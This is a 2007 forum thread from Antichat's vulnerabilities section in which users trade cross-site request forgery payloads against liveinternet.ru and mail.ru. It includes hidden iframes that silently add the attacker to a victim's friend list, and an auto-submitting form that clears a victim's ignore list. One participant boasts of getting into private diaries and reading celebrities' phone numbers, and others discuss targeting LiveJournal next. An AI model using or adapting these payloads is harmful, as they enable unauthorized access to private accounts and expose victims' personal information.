Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   liveinternet.ru - как попасть в закрытый раздел??? (https://forum.antichat.xyz/showthread.php?t=47400)

Nightmarе 23.08.2007 13:42

liveinternet.ru - как попасть в закрытый раздел???
 
САБЖ.
Вот смотрите:
http://www.liveinternet.ru/users/1448740/post33935451/

Доступ закрыт, ибо я недоверенное лицо, а можно как нить специальную ссылку составить через фрейм чтобы я автоматом попал куда надо???
Если кто знает то помогите плииз, с меня 10 плюсов.

guest3297 23.08.2007 13:46

надо что бы твой акк добавил владелец дневника.

Nightmarе 23.08.2007 13:54

Цитата:

Сообщение от [ cash ]
надо что бы твой акк добавил владелец дневника.


Ну ясное дело, а без его желания это можно как сделать???

Например в блогах майл ру это делается вот так:
<IFRAME src="http://my.foto.mail.ru/cgi-bin/friends?email=shinobi2%40mail.ru&type=1&add=1" width="0" height="0" border="0"></IFRAME>

А можно ли такой-же запрос в ливинете составить??? я просто не знаком с той системой ;(

helat 23.08.2007 21:40

http://www.liveinternet.ru/member2.php?action=addlist&userlist=buddy&userid=* ******&userownid=1448740


***** твой ид

<IFRAME src="http://www.liveinternet.ru/member2.php?action=addlist&userlist=buddy&userid=* ******&userownid=1448740" width="0" height="0" border="0"></IFRAME>

Nightmarе 24.08.2007 11:52

Цитата:

Сообщение от Nightmarе

http://www.liveinternet.ru/users/1448740/post33935451/


Охуеть, дайте две, на этой странице телефонов звёзд дохуя...
Вот лог из аськи:
Код:

Nightmare (23:32:48 23/08/2007)
приветик


Nightmare (23:33:06 23/08/2007)
скажи это ты на фотографии???
http://shinobi.org.ru/foto/foto1.gif


Дафна (12:44:10 24/08/2007)
24/08/2007 (05:53 GMT  +04:00)
Ytn


Дафна (12:44:10 24/08/2007)
24/08/2007 (05:53 GMT  +04:00)
Нет

Всё. Доступ есть!!!!!!!!!
helat мегареспект!!!!!!!!!!!!!!!!!!!!!!!!!!!! !

Как обходить бан я кстати тоже додумался, там фигня такая, что если не пост запрос, а гет то нельзя разбанить ;)

helat 24.08.2007 19:39

Ok. Всегда пожалст.

З/ы Про анбан стукни в аську потом

Nightmarе 24.08.2007 22:52

Цитата:

Сообщение от helat
Ok. Всегда пожалст.

З/ы Про анбан стукни в аську потом


С анбаном я разобрался, всё проще некуда, вот:
Код:

<iframe width=0 height=0 frameborder=0 src="frame.htm">
Ну и сам весёлый фрейм рядом с файлом:
Код:

<html>
<body>

<form name="xss" action="http://www.liveinternet.ru/member2.php" method="post">
<input type=hidden name="journalid" value="34799">
<input type="hidden" name="action" value="updatelist">
<input type="hidden" name="userlist" value="ignore">
<input type="hidden" name="url" value="">
<input type="text" class="bginput" name="listbits[]" size="30">
<input type="text" class="bginput" name="listbits[]" size="30">
<script language=javascript>xss.submit()</script>
</form>

</body>
</html>

34799 - ID жертвы.

Qwazar 24.08.2007 23:20

В livejournal подобное не прокатывает :(

Из за параметра lj_form_auth

helat 25.08.2007 00:43

я сам уже думал про ЖЖ.
Что то и там мб есть.

Nightmarе 25.08.2007 01:46

Цитата:

Сообщение от Qwazar
В livejournal подобное не прокатывает :(

Из за параметра lj_form_auth


Так можно и его прям во фрейм пихнуть и т.д...
Хотя ХЗ... можно новую тему поднять впринципе на обсуждение...
А так у меня именно в ливинете много дневников которые я все прохачил разом...
ЖЖ пока взламывать у меня нету обходимости...


Время: 09:01